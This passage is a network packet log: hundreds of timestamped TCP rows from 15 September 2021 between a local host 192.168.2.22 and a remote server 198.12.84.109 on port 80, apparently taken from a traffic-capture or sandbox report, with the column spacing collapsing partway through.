Sep 15, 2021 11:41:57.923880100 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:57.923901081 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:57.923902035 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:57.923916101 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:57.923923969 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:57.923933029 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:57.923944950 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:57.923962116 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:57.923969984 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:57.923978090 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:57.923993111 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:57.924009085 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:57.924015045 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:57.924032927 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:57.924050093 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:57.926304102 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.096196890 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.096235991 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.096261024 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.096282005 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.096301079 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.096323013 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.096344948 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.096362114 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.096365929 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.096385956 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.096406937 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.096417904 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.096429110 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.096443892 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.096451044 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.096452951 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.096471071 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.096478939 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.096492052 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.096493006 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.096512079 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.096532106 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.096549988 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.096554995 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.096570015 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.096575022 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.096590996 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.096592903 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.096611023 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.096615076 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.096632957 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.096633911 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.096653938 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.096656084 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.096676111 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.096695900 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.096714973 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.096718073 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.096734047 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.096739054 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.096751928 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.096756935 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.096774101 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.096776962 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.096793890 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.096796989 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.096812010 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.096817017 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.096837044 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.096843958 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.096857071 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.096888065 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.096915007 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.098982096 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.269525051 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.269563913 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.269587994 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.269613028 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.269637108 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.269660950 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.269681931 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.269699097 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.269722939 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.269740105 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.269756079 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.269772053 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.269785881 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.269788980 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.269804955 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.269812107 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.269815922 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.269819975 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.269823074 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.269823074 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.269825935 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.269829988 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.269843102 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.269848108 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.269861937 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.269865036 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.269877911 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.269877911 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.269893885 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.269895077 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.269910097 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.269913912 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.269925117 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.269932032 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.269942045 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.269953012 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.269957066 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.269972086 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.269973040 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.269990921 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.270006895 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.271704912 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.271732092 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.271744967 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.271760941 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.271781921 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.271800995 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.271820068 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.271845102 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.271856070 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.271867990 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.271879911 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.271883965 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.271888018 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.271908998 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.271915913 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.271928072 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.271933079 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.271945000 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.271964073 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.271965027 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.271984100 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.271984100 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.272002935 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.272005081 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.272020102 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.272026062 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.272042990 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.272043943 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.272063017 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.272063971 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.272078037 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.272083044 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.272109032 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.272121906 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.272133112 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.272156000 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.272177935 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.272209883 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.272213936 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.272217989 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.272219896 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.272310019 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.441473961 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.441513062 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.441533089 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.441556931 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.441581011 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.441602945 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.441626072 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.441649914 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.441875935 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.441910028 CEST  49165        80         192.168.2.22   198.12.84.109
Sep 15, 2021 11:41:58.444844007 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.444885015 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.444952965 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.444977045 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.444999933 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.445034981 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.445061922 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.445086002 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.445108891 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.445132971 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.445156097 CEST  80           49165      198.12.84.109  192.168.2.22
Sep 15, 2021 11:41:58.445178032 CEST  80           49165      198.12.84.109  192.168.2.22
                                              Sep 15, 2021 11:41:58.445200920 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445224047 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445250034 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445274115 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445293903 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445317030 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445339918 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445360899 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445382118 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445400953 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445425034 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445446014 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445466995 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445488930 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445508957 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445529938 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445550919 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445569992 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445593119 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445616007 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445635080 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445656061 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445676088 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445696115 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445715904 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445736885 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445760012 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.445782900 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.446100950 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.446135998 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.446140051 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.613452911 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.613488913 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.613512993 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.613533974 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.613574982 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.613660097 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.613666058 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.613667965 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.613821030 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.613847017 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.613871098 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.613888979 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.613905907 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.613907099 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.613933086 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.613957882 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.613976955 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.614099026 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.614101887 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.615890026 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.615953922 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.615983009 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.616017103 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.616027117 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.619035006 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.619074106 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.619101048 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.619143009 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.619168997 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622251987 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622283936 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622308016 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622335911 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622360945 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622386932 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622411966 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622437000 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622462988 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622487068 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622512102 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622514963 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622536898 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622555971 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622566938 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622575045 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622579098 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622579098 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622586012 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622589111 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622591972 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622594118 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622596979 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622600079 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622601986 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622602940 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622606039 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622608900 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622612000 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622615099 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622617006 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622620106 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622622013 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622638941 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622643948 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622659922 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622672081 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622679949 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622704029 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622725010 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622747898 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622771978 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622800112 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622827053 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622845888 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622852087 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622876883 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622876883 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622894049 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622896910 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622900009 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622900963 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622904062 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622911930 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622915030 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622917891 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622921944 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622939110 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622951984 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622961998 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622971058 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.622983932 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.622997046 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.623007059 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.623025894 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.623030901 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.623044968 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.623058081 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.623069048 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.623084068 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.623092890 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.623111963 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.623128891 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.623158932 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.623168945 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.623186111 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.623194933 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.623212099 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.623223066 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.623238087 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.623250008 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.623262882 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.623272896 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.623289108 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.623300076 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.623326063 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.626266003 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.785403013 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.785449028 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.785473108 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.785501003 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.785525084 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.785638094 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.785643101 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.785684109 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.785689116 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.785758018 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.785815001 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.786012888 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.786062002 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.786066055 CEST8049165198.12.84.109192.168.2.22
